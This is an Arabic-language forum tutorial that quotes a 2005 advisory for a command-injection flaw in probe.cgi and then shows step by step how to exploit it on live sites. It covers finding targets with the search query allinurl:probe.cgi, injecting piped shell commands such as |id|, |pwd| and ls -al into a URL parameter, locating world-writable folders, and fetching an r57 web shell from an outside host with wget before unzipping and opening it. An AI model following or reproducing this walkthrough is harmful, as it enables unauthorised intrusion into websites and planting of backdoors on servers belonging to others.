السلام عليكم ورحمة الله
راح نشرح عمل نوع من الثغرات وهي ما تسمى
(( Remote command exucetion ))
وهي تسمح لك برفع شل او باكدور ,,,,,,الخ
اول حاجه لازم يكون عندك شل مرفوع بموقعك او احد المواقع,,,
طيب خلينا نجيب ثغره ونطبق عنونها كذا
Probe.cgi
Remote command Execution
يعني بملف Probe.cgi فيه ثغره رموت كومند حلو ...طيب خلونا نشوف الاكسبلويت
---------------------------------------------------------
Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-2005
Product ....... probe.cgi
Type .......... Remote command Execution
o Info:
================
That '''''''''''' is used to open file '.dat'.
o Vulnerable Code:
================
..
23 [...]
24 $old = $query->param('olddat');
25 [...]
..
..
34 [...]
35 open (VF, "$olddat");
36 [...]
..
(24) At this line, the cgi param 'olddat' is associated to one database.
This variable isnt checked by anyone matching, so you can open
all file that you want. (35) At this line the '''''''''''' open the file
that you had chosen. With pipe `|`
is possible to execute arbitrary code on the ''''''''l.
o Proof of concept:
================
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www)
--------------------------------------------------------------
لو تقراء باعلى موضح لك الملف ونوع الثغره,,,,,طيب احنا عوزين الاستثمار
استثمارها هنا بالسطر
كود:
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي
cgi-bin<<===مجلد السيقيبين
probe.cgi<<===الملف المصاب
olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
===============
طيب نبغى نعرف كيف عملها اوكي
اول تسوي بحث بالطريقه هذي
allinurl:probe.cgi
او اي طريقة تحب
لنفرض اننا حصل موقع
WWW.???.com/cgi.bin/probe.cgi?grid=ThaiGrid
كويس اول حاجه نضع
كود:
|id|
بيطلع بالشكل
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|id|
واعطيه انتر بيظهر لك مثلا كذا
كود:
uid=99(www) gid=99(www)
هذا صفتك بالسيرفر
طيب نبغى ننعرفع ممكاننا وين ضع مكان الاي دي
كود:
pwd
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|pwd|
بيطلع معك مثلا
كود:
/home/.???/cgi.bin
طيب نبغى نشوف مسموح لينا نرفع ملف والا لا؟
ضع مكان الاي دي
كود:
which wget
بالشكل,,,,,,,,,
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|which wget|
اذا ضهر لك كدا
كود:
/؟؟؟/؟؟؟/wget
وعلامة الاستفاهم متغير يعني اهم شي ويقت تظهر فاعرف انك الوضع زي الفل
يعني مسموح لك ترفع ملف انبسط ياعم
طيب نبغى نعرف التصاريح للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع
لو ترجع احنا قلنا مكاننا وين هنا
كود:
/home/.???/cgi.bin
طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري الرئيسي حلو
نضع مكان الاي دي
كود:
cd /home/.???/;pwd
يعني بيكون بالشكل
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|
الان بيرجعنا الى
كود:
home/.???/
حلو الان نبغى نشوف المجلدات والمفات و التصريحات بالامر
كود:
;ls%20-al
بيطلع كذا,,,,,
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|
بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم
انت ابحث عن الملجلد اللي له التصريح
كود:
drwxrwxrwx
لنفرض انك حصلت امام مجلد الصور او uploads
اولا لازم نخش عليه تعمل
كود:
home/.???/uploads/;pwd
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|
حلو بيكون وضعك بالشكل
كود:
home/.???/uploads/
يعني داخل مجلد uploads
الان كل معليك رفع الشل طبعا لك شل مرفوع باحد المواقع يعني رابط شيلك
كود:
www.XXX.com/r57''''''''l.zip
وتبغى ترفعه على الموقع المخترقه بالشكل,,,,
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57''''''''l.zip*|
واعطيه انتر بيظهر لك
كود:
r57''''''''l.zip
طيب نبغى نفك الضغط عنه بالامر unzip
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57''''''''l.zip*|
وديلو انتر بيطلع معك
كود:
r57''''''''l.php
والف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط
WWW.???.com/uploads/r57''''''''l.php
عموما ياجماعه الموضع كله انك تعرف كيف تتحرك وترفع ,,, وراح تكون الثغرات اسهل منها ما فيه
والى اللقاء
أخوكم super cristal